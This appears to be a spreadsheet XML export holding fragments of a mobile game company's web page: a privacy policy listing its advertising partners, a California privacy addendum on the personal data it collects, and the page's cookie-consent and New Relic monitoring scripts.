&lt;table border="1" width="979" cellspacing="0" cellpadding="0"&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p align="center"&gt;&lt;strong&gt;Advertising partner&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
 &lt;td&gt;
&lt;p align="center"&gt;&lt;strong&gt;Link to Privacy Policy&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
 &lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;AdMob (Google)&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://policies.google.com/technologies/partner-sites?mcOpenExternal=true" target="_blank" rel="noopener"&gt; https://policies.google.com/technologies/partner-sites &lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;Applovin&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://www.applovin.com/privacy/" target="_blank" rel="noopener"&gt;https://www.applovin.com/privacy/&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;Inmobi&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://www.inmobi.com</t>
  </si>
  <si>
    <t>/privacy-policy" target="_blank" rel="noopener"&gt;https://www.inmobi.com/privacy-policy&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;ironSource&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/?mcOpenExternal=true" target="_blank" rel="noopener"&gt; https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/ &lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;Unity Ads&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://unity3d.com/legal/privacy-policy?mcOpenExternal=true" target="_blank" rel="noopener"&gt; https://unity3d.com/legal/privacy-policy &lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;a id="cppa"&gt;&lt;/a&gt;ADDENDUM 1 - CALIFORNIA PRIVACY RIGHTS&lt;/h3&gt;
&lt;p&gt;The terms of this Addendum apply to residents of California under the California Consumer Privacy Act of 2018 (California Civil Code &amp;sect;&amp;sect; 1798.100 to 1798.199) and its implementing regulations, as amended or superseded from time to time ("CCPA"). For the purposes of this addendum, Personal Information means information that identifies, relates to, describes, is reasonably capable of being associated with, or could reasonably be linked, directly or indirectly, with a particular consumer or household, or as otherwise defined by the CCPA.</t>
  </si>
  <si>
    <t>Personal Information does not include information that is: lawfully made available from government records, deidentified or aggregated, or otherwise excluded from the scope of the CCPA.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Collection and Disclosure of Personal Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Over the past 12 months, through your use of the Games, we may have collected and disclosed the following categories of Personal Information from or about you:&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;Identifiers, including IP address, device identifiers and advertising ID. This information is collected directly from you or your device.&lt;/li&gt;
&lt;li&gt;Internet or other electronic network activity information, including your use of in-game features and events and information on your in-game activity, and information on your interactions with advertising shown in on our Games. This information is collected from our selected third party analytics providers and advertising partners.&lt;/li&gt;
&lt;li&gt;Geolocation data, including city level location data.</t>
  </si>
  <si>
    <t>This information is collected directly from you or your device and from third party services when you register through them.&lt;/li&gt;
&lt;li&gt;Commercial information, including records of products or services purchased, obtained, or considered, your Apple ID number for Apple, your postcode and state for Google. This information is collected directly from you or your device, and from our payment processors.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt;In the preceding twelve months, we have collected Personal Information from the following categories of sources:&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt;1. You/Your Devices directly.&lt;/p&gt;
&lt;p</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
&lt;!-- OneTrust Cookies Consent Notice start --&gt;
&lt;script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" type="text/javascript" charset="UTF-8" data-document-language="true" data-domain-script="5a13b7b2-0898-4109-a855-793b7b1196fa"&gt;&lt;/script&gt;
&lt;script&gt;
    function OptanonWrapper() {
        OneTrust.OnConsentChanged(function() {
            location.reload(true);
       });
    };
&lt;/script&gt;
&lt;!-- OneTrust Cookies Consent Notice end --&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta http-equiv="x-ua-compatible" content="ie=edge"&gt;&lt;script type="text/javascript"&gt;(window.</t>
  </si>
  <si>
    <t>NREUM||(NREUM={})).init={ajax:{deny_list:["bam.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"129fe16bc0",applicationID:"191794594"};;(()=&gt;{var e,t,r={8768:(e,t,r)=&gt;{"use strict";r.d(t,{T:()=&gt;n,p:()=&gt;i});const n=/(iPad|iPhone|iPod)/g.test(navigator.userAgent),i=n&amp;&amp;Boolean("undefined"==typeof SharedWorker)},6562:(e,t,r)=&gt;{"use strict";r.d(t,{P_:()=&gt;v,Mt:()=&gt;p,C5:()=&gt;d,DL:()=&gt;w,OP:()=&gt;R,lF:()=&gt;z,Yu:()=&gt;A,Dg:()=&gt;h,CX:()=&gt;f,GE:()=&gt;y,sU:()=&gt;M});var n={};r.r(n),r.d(n,{agent:()=&gt;x,match:()=&gt;k,version:()=&gt;j});var i=r(6797),o=r(909),a=r(8610);class s{constructor(e,t){try{if(!e||"object"!=typeof e)return(0,a. Z)("New setting a Configurable requires an object as input");if(!t||"object"!=typeof t)return(0,a. Z)("Setting a Configurable requires a model to set its initial properties");Object.assign(this,t),Object.entries(e).forEach((e=&gt;{let[t,r]=e;const n=(0,o.q)(t);n.length&amp;&amp;r&amp;&amp;"object"==typeof r&amp;&amp;n.forEach((e=&gt;{e in r&amp;&amp;((0,a.</t>
  </si>
  <si>
    <t>Z)("An error occured while setting a Configurable",e)}}}const c={beacon:i.ce.beacon,errorBeacon:i.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},u={};function d(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!u[e])throw new Error("Info for ".concat(e," was never set"));return u[e]}function f(e,t){if(!e)throw new Error("All info objects require an agent identifier!");u[e]=new s(t,c),(0,i.Qy)(e,u[e],"info")}const l={allow_bfcache:!0,privacy:{cookies_enabled:!0},ajax:{deny_list:void 0,enabled:!0,harvestTimeSeconds:10},distributed_tracing:{enabled:void 0,exclude_newrelic_header:void 0,cors_use_newrelic_header:void 0,cors_use_tracecontext_headers:void 0,allowed_origins:void 0},ssl:void 0,obfuscate:void 0,jserrors:{enabled:!0,harvestTimeSeconds:10},metrics:{enabled:!0},page_action:{enabled:!0,harvestTimeSeconds:30},page_view_event:{enabled:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1},session_trace:{enabled:!0,harvestTimeSeconds:10},spa:{enabled:!0,harvestTimeSeconds:10}},g={};function v(e){if(!e)throw new Error("All configuration objects require an agent identifier!");if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function h(e,t){if(!e)throw new Error("All configuration objects require an agent identifier!");g[e]=new s(t,l),(0,i.Qy)(e,g[e],"config")}function p(e,t){if(!e)throw new Error("All configuration objects require an agent identifier!");var r=v(e);if(r){for(var n=t.split(". "),i=0;i&lt;n.length-1;i++)if("object"!=typeof(r=r[n[i]]))return;r=r[n[n.length-1]]}return r}const m={accountID:void 0,trustKey:void 0,agentID:void 0,licenseKey:void 0,applicationID:void 0,xpid:void 0},b={};function w(e){if(!e)throw new Error("All loader-config objects require an agent identifier!");if(!b[e])throw new Error("LoaderConfig for ".concat(e," was never set"));return b[e]}function y(e,t){if(!e)throw new Error("All loader-config objects require an agent identifier!");b[e]=new s(t,m),(0,i.Qy)(e,b[e],"loader_config")}const A=(0,i.mF)().o;var x =null,j=null;const _=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var E=navigator.userAgent,D=E.match(_);D&amp;&amp;-1===E.indexOf("Chrome")&amp;&amp;-1===E.indexOf("Chromium")&amp;&amp;(x="Safari",j=D[1])}function k(e,t){if(!x)return!1;if(e!==x)return!1;if(!t)return!0;if(!j)return!1;for(var r=j.split(".</t>
  </si>
  <si>
    <t>"),n=t.split(". "),i=0;i&lt;n.length;i++)if(n[i]!==r[i])return!1;return!0}var S=r(5526),P=r(2374);const T="NRBA_SESSION_ID";function N(){if(!P.il)return null;try{let e;return null===(e=window.sessionStorage.getItem(T))&amp;&amp;(e=(0,S.ky)(16),window.sessionStorage.setItem(T,e)),e}catch(e){return null}}var O =r(8226);const I=e=&gt;({buildEnv:O.Re,customTransaction:void 0,disabled:!1,distMethod:O.gF,isolatedBacklog:!1,loaderType:void 0,maxBytes:3e4,offset:Math.floor(P._A?.performance?.timeOrigin||P._A?.performance?.timing?.navigationStart||Date.now()),onerror:void 0,origin:""+P._A.location,ptid:void 0,releaseIds:{},sessionId:1==p(e,"privacy.cookies_enabled")?N():null,xhrWrappable:"function"==typeof P._A.XMLHttpRequest?.prototype?.addEventListener,userAgent:n,version:O.q4}),C={};function R(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!C[e])throw new Error("Runtime for ".concat(e," was never set"));return C[e]}function M(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");C[e]=new s(t,I(e)),(0,i.Qy)(e,C[e],"runtime")}function z(e){return function(e){try{const t=d(e);return!!t.licenseKey&amp;&amp;!!t.errorBeacon&amp;&amp;!!t.applicationID}catch(e){return!1}}(e)}},8226:(e,t,r)=&gt;{"use strict";r.d(t,{Re:()=&gt;i,gF:()=&gt;o,q4:()=&gt;n});const n="1.229.0",i="PROD",o="CDN"},9557:(e,t,r)=&gt;{"use strict";r.d(t,{w:()=&gt;o});var n=r(8610);const i={agentIdentifier:""};class o{constructor(e){try{if("object"!=typeof e)return(0,n.</t>
  </si>
  <si>
    <t>Z)("shared context requires an object as input");this.sharedContext={},Object.assign(this.sharedContext,i),Object.entries(e).forEach((e=&gt;{let[t,r]=e;Object.keys(i).includes(t)&amp;&amp;(this.sharedContext[t]=r)}))}catch(e){(0,n.Z)("An error occured while setting SharedContext",e)}}}},4329:(e,t,r)=&gt;{"use strict";r.d(t,{L:()=&gt;d,R:()=&gt;c});var n=r(3752),i=r(7022),o=r(4045),a=r(2325);const s={};function c(e,t){const r={staged:!1,priority:a.p[t]||0};u(e),s[e].get(t)||s[e].set(t,r)}function u(e){e&amp;&amp;(s[e]||(s[e]=new Map))}function d(){let e=arguments.length&gt;0&amp;&amp;void 0!==arguments[0]?arguments[0]:"",t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:"feature";if(u(e),!e||!s[e].get(t))return a(t);s[e].get(t).staged=!0;const r=Array.from(s[e]);function a(t){const r=e?n.ee.get(e):n.ee,a=o.X.handlers;if(r.backlog&amp;&amp;a){var s =r.backlog[t],c=a[t];if(c){for(var u=0;s&amp;&amp;u&lt;s.length;++u)f(s[u],c);(0,i. D)(c,(function(e,t){(0,i.</t>
  </si>
  <si>
    <t>D)(t,(function(t,r){r[0].on(e,r[1])}))}))}delete a[t],r.backlog[t]=null,r.emit("drain-"+t,[])}}r.every((e=&gt;{let[t,r]=e;return r.staged}))&amp;&amp;(r.sort(((e,t)=&gt;e[1].priority-t[1].priority)),r.forEach((e=&gt;{let[t]=e;a(t)})))}function f(e,t){var r=e[1];(0,i. D)(t[r],(function(t,r){var n=e[0];if(r[0]===n){var i=r[1],o=e[3],a=e[2];i.apply(o,a)}}))}},3752:(e,t,r)=&gt;{"use strict";r.d(t,{ee:()=&gt;u});var n=r(6797),i=r(3916),o=r(7022),a=r(6562),s="nr@context";let c=(0,n.fP)();var u;function d(){}function f(){return new d}function l(){u.aborted=!0,u.backlog={}}c.ee?u=c.ee:(u=function e(t,r){var n={},c={},g={},v=!1;try{v=16===r.length&amp;&amp;(0,a. OP)(r).isolatedBacklog}catch(e){}var h={on:b,addEventListener:b,removeEventListener:w,emit:m,get:A,listeners:y,context:p,buffer:x,abort:l,aborted:!1,isBuffering:j,debugId:r,backlog:v?{}:t&amp;&amp;"object"==typeof t.backlog?t.backlog:{}};return h;function p(e){return e&amp;&amp;e instanceof d?e:e?(0,i.</t>
  </si>
  <si>
    <t>X)(e,s,f):f()}function m(e,r,n,i,o){if(!1!==o&amp;&amp;(o=!0),!u.aborted||i){t&amp;&amp;o&amp;&amp;t.emit(e,r,n);for(var a=p(n),s=y(e),d=s.length,f=0;f&lt;d;f++)s[f].apply(a,r);var l=_()[c[e]];return l&amp;&amp;l.push([h,e,r,a]),a}}function b(e,t){n[e]=y(e).concat(t)}function w(e,t){var r=n[e];if(r)for(var i=0;i&lt;r.length;i++)r[i]===t&amp;&amp;r.splice(i,1)}function y(e){return n[e]||[]}function A(t){return g[t]=g[t]||e(h,t)}function x(e,t){var r=_();h.aborted||(0,o. D)(e,(function(e,n){t=t||"feature",c[n]=t,t in r||(r[t]=[])}))}function j(e){return!!_()[c[e]]}function _(){return h.backlog}}(void 0,"globalEE"),c.ee=u)},9252:(e,t,r)=&gt;{"use strict";r.d(t,{E:()=&gt;n,p:()=&gt;i});var n=r(3752).ee.get("handle");function i(e,t,r,i,o){o?(o.buffer([e],i),o.emit(e,t,r)):(n.buffer([e],i),n.emit(e,t,r))}},4045:(e,t,r)=&gt;{"use strict";r.d(t,{X:()=&gt;o});var n=r(9252);o.on=a;var i=o.handlers={};function o(e,t,r,o){a(o||n. E,i,e,t,r)}function a(e,t,r,i,o){o||(o="feature"),e||(e=n.E);var a=t[o]=t[o]||{};(a[r]=a[r]||[]).push([e,i])}},8544:(e,t,r)=&gt;{"use strict";r.d(t,{bP:()=&gt;s,iz:()=&gt;c,m$:()=&gt;a});var n=r(2374);let i=!1,o=!1;try{const e={get passive(){return i=!0,!1},get signal(){return o=!0,!1}};n._A.addEventListener("test",null,e),n._A.removeEventListener("test",null,e)}catch(e){}function a(e,t){return i||o?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let r=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]&amp;&amp;arguments[2];window.addEventListener(e,t,a(r))}function c(e,t){let r=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]&amp;&amp;arguments[2];document.addEventListener(e,t,a(r))}},5526:(e,t,r)=&gt;{"use strict";r.d(t,{Rl:()=&gt;i,ky:()=&gt;o});var n=r(2374);function i(){var e=null,t=0,r=n._A?.crypto||n._A?.msCrypto;function i(){return e?15&amp;e[t++]:16*Math.random()|0}r&amp;&amp;r.getRandomValues&amp;&amp;(e=r.getRandomValues(new Uint8Array(31)));for(var o,a="xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx",s="",c=0;c&lt;a.length;c++)s+="x"===(o=a[c])?i().toString(16):"y"===o?(o=3&amp;i()|8).toString(16):o;return s}function o(e){var t=null,r=0,n=self.crypto||self.msCrypto;n&amp;&amp;n.getRandomValues&amp;&amp;Uint8Array&amp;&amp;(t=n.getRandomValues(new Uint8Array(31)));for(var i=[],o=0;o&lt;e;o++)i.push(a().toString(16));return i.join("");function a(){return t?15&amp;t[r++]:16*Math.random()|0}}},2053:(e,t,r)=&gt;{"use strict";function n(){return Math.round(performance.now())}r.d(t,{z:()=&gt;n})},8610:(e,t,r)=&gt;{"use strict";function n(e,t){console&amp;&amp;console.warn&amp;&amp;"function"==typeof console.warn&amp;&amp;(console.warn("New Relic: ".concat(e)),t&amp;&amp;console.warn(t))}r.d(t,{Z:()=&gt;n})},3916:(e,t,r)=&gt;{"use strict";r.d(t,{X:()=&gt;i});var n=Object.prototype.hasOwnProperty;function i(e,t,r){if(n.call(e,t))return e[t];var</t>
  </si>
  <si>
    <t>i=r();if(Object.defineProperty&amp;&amp;Object.keys)try{return Object.defineProperty(e,t,{value:i,writable:!0,enumerable:!1}),i}catch(e){}return e[t]=i,i}},2374:(e,t,r)=&gt;{"use strict";r.d(t,{_A:()=&gt;o,il:()=&gt;n,lW:()=&gt;a,v6:()=&gt;i});const n=Boolean("undefined"!=typeof window&amp;&amp;window.document),i=Boolean("undefined"!=typeof WorkerGlobalScope&amp;&amp;self.navigator instanceof WorkerNavigator);let o=(()=&gt;{if(n)return window;if(i){if("undefined"!=typeof globalThis&amp;&amp;globalThis instanceof WorkerGlobalScope)return globalThis;if(self instanceof WorkerGlobalScope)return self}throw new Error('New Relic browser agent shutting down due to error: Unable to locate global scope. This is possibly due to code redefining browser global variables like "self" and "window".</t>
  </si>
  <si>
    <t>')})();function a(){return o}},7022:(e,t,r)=&gt;{"use strict";r.d(t,{D:()=&gt;i});var n=Object.prototype.hasOwnProperty;function i(e,t){var r=[],i="",o=0;for(i in e)n.call(e,i)&amp;&amp;(r[o]=t(i,e[i]),o+=1);return r}},2438:(e,t,r)=&gt;{"use strict";r.d(t,{P:()=&gt;o});var n=r(3752);const i=()=&gt;{const e=new WeakSet;return(t,r)=&gt;{if("object"==typeof r&amp;&amp;null!==r){if(e.has(r))return;e.add(r)}return r}};function o(e){try{return JSON.stringify(e,i())}catch(e){try{n.ee.emit("internal-error",[e])}catch(e){}}}},2650:(e,t,r)=&gt;{"use strict";r.d(t,{K:()=&gt;a,b:()=&gt;o});var n=r(8544);function i(){return"undefined"==typeof document||"complete"===document.readyState}function o(e,t){if(i())return e();(0,n.bP)("load",e,t)}function a(e){if(i())return e();(0,n.iz)("DOMContentLoaded",e)}},6797:(e,t,r)=&gt;{"use strict";r.d(t,{EZ:()=&gt;u,Qy:()=&gt;c,ce:()=&gt;o,fP:()=&gt;a,gG:()=&gt;d,mF:()=&gt;s});var n=r(2053),i=r(2374);const o={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net"};function a(){return i._A.NREUM||(i._A.NREUM={}),void 0===i._A.newrelic&amp;&amp;(i._A.newrelic=i._A.NREUM),i._A.NREUM}function s(){let e=a();return e.o||(e.o={ST:i._A.setTimeout,SI:i._A.setImmediate,CT:i._A.clearTimeout,XHR:i._A.XMLHttpRequest,REQ:i._A.Request,EV:i._A.Event,PR:i._A.Promise,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t,r){let i=a();const o=i.initializedAgents||{},s=o[e]||{};return Object.keys(s).length||(s.initializedAt={ms:(0,n.z)(),date:new Date}),i.initializedAgents={...o,[e]:{...s,[r]:t}},i}function u(e,t){a()[e]=t}function d(){return function(){let e=a();const t=e.info||{};e.info={beacon:o.beacon,errorBeacon:o.errorBeacon,...t}}(),function(){let e=a();const t=e.init||{};e.init={...t}}(),s(),function(){let e=a();const t=e.loader_config||{};e.loader_config={...t}}(),a()}},6998:(e,t,r)=&gt;{"use strict";r.d(t,{N:()=&gt;i});var n=r(8544);function i(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]&amp;&amp;arguments[1];return void(0,n.iz)("visibilitychange",(function(){if(t){if("hidden"!=document.visibilityState)return;e()}e(document.visibilityState)}))}},6034:(e,t,r)=&gt;{"use strict";r.d(t,{gF:()=&gt;o,mY:()=&gt;i,t9:()=&gt;n,vz:()=&gt;s,xS:()=&gt;a});const n=r(2325).D.metrics,i="sm",o="cm",a="storeSupportabilityMetrics",s="storeEventMetrics"},2484:(e,t,r)=&gt;{"use strict";r.d(t,{Dz:()=&gt;i,OJ:()=&gt;a,qw:()=&gt;o,t9:()=&gt;n});const n=r(2325).D.pageViewEvent,i="firstbyte",o="domcontent",a="windowload"},6382:(e,t,r)=&gt;{"use strict";r.d(t,{t:()=&gt;n});const n=r(2325).D.pageViewTiming},1509:(e,t,r)=&gt;{"use strict";r.d(t,{W:()=&gt;s});var n=r(6562),i=r(3752),o=r(5432),a=r(6797);class s{constructor(e,t,r){this.agentIdentifier=e,this.aggregator=t,this.ee=i.ee.get(e,(0,n.</t>
  </si>
  <si>
    <t>OP)(this.agentIdentifier).isolatedBacklog),this.featureName=r,this.blocked=!1,this.checkConfiguration()}checkConfiguration(){if(!(0,n.lF)(this.agentIdentifier)){let e={...(0,a.gG)().info?.jsAttributes};try{e={...e,...(0,n. C5)(this.agentIdentifier)?.jsAttributes}}catch(e){}(0,o.j)(this.agentIdentifier,{...(0,a.gG)(),info:{...(0,a.gG)().info,jsAttributes:e}})}}}},5432:(e,t,r)=&gt;{"use strict";r.d(t,{j:()=&gt;y});var n=r(8683),i=r.n(n),o=r(2325),a=r(6562),s=r(9252),c=r(7022),u=r(3752),d=r(2053),f=r(4329),l=r(2650),g=r(2374),v=r(8610),h=r(6034);var p=r(6797);const m={stn:[o. D.sessionTrace],err:[o.D.jserrors,o.D.metrics],ins:[o.</t>
  </si>
  <si>
    <t>D.pageAction],spa:[o. D.spa]};const b={};function w(){const e=(0,p.gG)();["setErrorHandler","finished","addToTrace","inlineHit","addRelease","addPageAction","setCurrentRouteName","setPageViewName","setCustomAttribute","interaction","noticeError"].forEach((t=&gt;{e[t]=function(){for(var r=arguments.length,n=new Array(r),i=0;i&lt;r;i++)n[i]=arguments[i];return function(t){for(var r=arguments.length,n=new Array(r&gt;1?r-1:0),i=1;i&lt;r;i++)n[i-1]=arguments[i];let o=[];return Object.values(e.initializedAgents).forEach((e=&gt;{e.exposed&amp;&amp;e.api[t]&amp;&amp;o.push(e.api[t](...n))})),o.length&gt;1?returnsVals:o[0]}(t,...n)}}))}function y(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:{},n=arguments.length&gt;2?arguments[2]:void 0,y=arguments.length&gt;3?arguments[3]:void 0,{init: A,info:x,loader_config:j,runtime:_={loaderType:n},exposed:E=!0}=t;const D=(0,p.gG)();x||(A=D.init,x=D.info,j=D.loader_config),g.v6&amp;&amp;(x.jsAttributes={...x.jsAttributes,isWorker:!0}),(0,a.</t>
  </si>
  <si>
    <t>CX)(e,x),(0,a. Dg)(e,A||{}),(0,a. GE)(e,j||{}),(0,a.sU)(e,_),w();const k=function(e,t){t||(0,f.</t>
  </si>
  <si>
    <t>R)(e,"api");const n={};var p=u.ee.get(e),m=p.get("tracer"),b="api-",w=b+"ixn-";function y(){}(0,c. D)(["setErrorHandler","finished","addToTrace","inlineHit","addRelease"],(function(e,t){n[t]=x(b,t,!0,"api")})),n.addPageAction=x(b,"addPageAction",!0,o. D.pageAction),n.setCurrentRouteName=x(b,"routeName",!0,o.</t>
  </si>
  <si>
    <t>D.spa),n.setPageViewName=function(t,r){if("string"==typeof t)return"/"!==t.charAt(0)&amp;&amp;(t="/"+t),(0,a. OP)(e).customTransaction=(r||"http://custom.transaction")+t,x(b,"setPageViewName",!0,"api")()},n.setCustomAttribute=function(t,r){const n=(0,a.C5)(e);return(0,a. CX)(e,{...n,jsAttributes:{...n.jsAttributes,[t]:r}}),x(b,"setCustomAttribute",!0,"api")()},n.interaction=function(){return(new y).get()};var</t>
  </si>
  <si>
    <t>A=y.prototype={createTracer:function(e,t){var r={},n=this,i="function"==typeof t;return(0,s.p)(w+"tracer",[(0,d.z)(),e,r],n,o.D.spa,p),function(){if(m.emit((i?"":"no-")+"fn-start",[(0,d.z)(),n,i],r),i)try{return t.apply(this,arguments)}catch(e){throw m.emit("fn-err",[arguments,this,"string"==typeof e?new Error(e):e],r),e}finally{m.emit("fn-end",[(0,d.z)()],r)}}}};function x(e,t,r,n){return function(){return(0,s.p)(h.xS,["API/"+t+"/called"],void 0,o. D.metrics,p),(0,s.p)(e+t,[(0,d.z)()].concat(i()(arguments)),r?null:this,n,p),r?void 0:this}}function j(){r.e(439).then(r.bind(r,5692)).then((t=&gt;{let{setAPI:r}=t;r(e),(0,f. L)(e,"api")})).catch((()=&gt;(0,v.</t>
  </si>
  <si>
    <t>Z)("Downloading runtime APIs failed...")))}return(0,c. D)("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),(function(e,t){A[t]=x(w,t,void 0,o. D.spa)})),n.noticeError=function(e,t){"string"==typeof e&amp;&amp;(e=new Error(e)),(0,s.p)(h.xS,["API/noticeError/called"],void 0,o.</t>
  </si>
  <si>
    <t>D.metrics,p),(0,s.p)("err",[e,(0,d.z)(),!1,t],void 0,o. D.jserrors,p)},g.v6?j():(0,l.b)((()=&gt;j()),!0),n}(e,y);return(0,p.Qy)(e,k,"api"),(0,p.Qy)(e,E,"exposed"),(0,p.EZ)("activatedFeatures",b),(0,p.EZ)("setToken",(t=&gt;function(e,t){var r=u.ee.get(t);e&amp;&amp;"object"==typeof e&amp;&amp;((0,c. D)(e,(function(e,t){if(!t)return(m[e]||[]).forEach((t=&gt;{(0,s.p)("block-"+e,[],void 0,t,r)}));b[e]||((0,s.p)("feat-"+e,[],void 0,m[e],r),b[e]=!0)})),(0,f.</t>
  </si>
  <si>
    <t>L)(t,o.D.pageViewEvent))}(t,e))),k}},909:(e,t,r)=&gt;{"use strict";r.d(t,{Z:()=&gt;i,q:()=&gt;o});var n=r(2325);function i(e){switch(e){case n.D.ajax:return[n. D.jserrors];case n.D.sessionTrace:return[n. D.ajax,n.D.pageViewEvent];case n.</t>
  </si>
  <si>
    <t>"+{78:"8658345c",147:"fde0a6c6",193:"afe7d95b",317:"265ba41e",348:"92e7c907",439:"71768fc8",729:"ff971c03",786:"a968183b",862:"5040a0e9",873:"6a952689",898:"ebcbd305"}[e]+"-1.229.0.min.js"),i.o=(e,t)=&gt;Object.prototype.hasOwnProperty.call(e,t),e={},t="NRBA:",i.l=(r,n,o,a)=&gt;{if(e[r])e[r].push(n);else{var s,c;if(void 0!==o)for(var u=document.getElementsByTagName("script"),d=0;d&lt;u.length;d++){var f =u[d];if(f.getAttribute("src")==r||f.getAttribute("data-webpack")==t+o){s=f;break}}s||(c=!0,(s=document.createElement("script")).charset="utf-8",s.timeout=120,i.nc&amp;&amp;s.setAttribute("nonce",i.nc),s.setAttribute("data-webpack",t+o),s.src=r),e[r]=[n];var l=(t,n)=&gt;{s.onerror=s.onload=null,clearTimeout(g);var i=e[r];if(delete e[r],s.parentNode&amp;&amp;s.parentNode.removeChild(s),i&amp;&amp;i.forEach((e=&gt;e(n))),t)return t(n)},g=setTimeout(l.bind(null,void 0,{type:"timeout",target:s}),12e4);s.onerror=l.bind(null,s.onerror),s.onload=l.bind(null,s.onload),c&amp;&amp;document.head.appendChild(s)}},i.r=e=&gt;{"undefined"!=typeof Symbol&amp;&amp;Symbol.toStringTag&amp;&amp;Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.p="https://js-agent.newrelic.com/",(()=&gt;{var e={521:0,38:0};i.f.j=(t,r)=&gt;{var n=i.o(e,t)?e[t]:void 0;if(0!==n)if(n)r.push(n[2]);else{var o=new Promise(((r,i)=&gt;n=e[t]=[r,i]));r.push(n[2]=o);var a=i.p+i.u(t),s=new Error;i.l(a,(r=&gt;{if(i.o(e,t)&amp;&amp;(0!==(n=e[t])&amp;&amp;(e[t]=void 0),n)){var o=r&amp;&amp;("load"===r.type?"missing":r.type),a=r&amp;&amp;r.target&amp;&amp;r.target.src;s.message="Loading chunk "+t+" failed.\n("+o+": "+a+")",s.name="ChunkLoadError",s.type=o,s.request=a,n[1](s)}}),"chunk-"+t,t)}};var t=(t,r)=&gt;{var n,o,[a,s,c]=r,u=0;if(a.some((t=&gt;0!==e[t]))){for(n in s)i.o(s,n)&amp;&amp;(i.m[n]=s[n]);if(c)c(i)}for(t&amp;&amp;t(r);u&lt;a.length;u++)o=a[u],i.o(e,o)&amp;&amp;e[o]&amp;&amp;e[o][0](),e[o]=0},r=window.webpackChunkNRBA=window.webpackChunkNRBA||[];r.forEach(t.bind(null,0)),r.push=t.bind(null,r.push.bind(r))})();var o={};(()=&gt;{"use strict";i.r(o);var e=i(2325),t=i(6562);const r=Object.values(e.D);function n(e){const n={};return r.forEach((r=&gt;{n[r]=function(e,r){return!1!==(0,t.</t>
  </si>
  <si>
    <t>Mt)(r,"".concat(e,".enabled"))}(r,e)})),n}var a=i(5432),s=i(909),c=i(9252),u=i(8768),d=i(4329),f=i(1509),l=i(2650),g=i(2374),v=i(8610);class h extends f.W{constructor(e,t,r){let n=!(arguments.length&gt;3&amp;&amp;void 0!==arguments[3])||arguments[3];super(e,t,r),this.hasAggregator=!1,this.auto=n,this.abortHandler,n&amp;&amp;(0,d.R)(e,r)}importAggregator(){if(this.hasAggregator||!this.auto)return;this.hasAggregator=!0;const e=async()=&gt;{try{const{lazyLoader:e}=await i.e(729).then(i.bind(i,8110)),{Aggregate:t}=await e(this.featureName,"aggregate");new t(this.agentIdentifier,this.aggregator)}catch(e){(0,v. Z)("Downloading ".concat(this.featureName," failed...")),this.abortHandler?.()}};g.v6?e():(0,l.b)((()=&gt;e()),!0)}}var p,m,b,w=i(2484),y=i(2053);class A extends h{constructor(r,n){let i=!(arguments.length&gt;2&amp;&amp;void 